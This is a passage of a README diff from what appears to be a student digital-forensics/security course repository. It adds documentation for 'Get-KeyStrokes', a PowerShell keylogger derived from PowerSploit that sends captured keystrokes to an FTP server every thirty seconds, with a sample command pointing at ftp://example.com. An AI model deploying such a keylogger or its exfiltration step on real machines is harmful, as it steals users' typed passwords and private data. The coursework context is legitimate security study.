TRDan6577/DFIR_trd6577_CSEC475/README.md

 that do not have two factor authentication enabled and have changed their Google settings to allow insecure app access
 * -Computers allows you to specify remote computer to connect to and gather this information from

+## Get-KeyStrokes
+This powershell script uses much of the work done by Chris Campbell and Matthew Graeber in their key logger script (which is part of their PowerSpolit Library).
+It logs a user's keystrokes and then sends the keystrokes to an ftp server every thirty seconds.

+### Usage
+`Get-KeyStrokes -FtpServer ftp://example.com`

+Logs in with anonymous/anonymous

+## Author
 Repository owner: Tom Daniels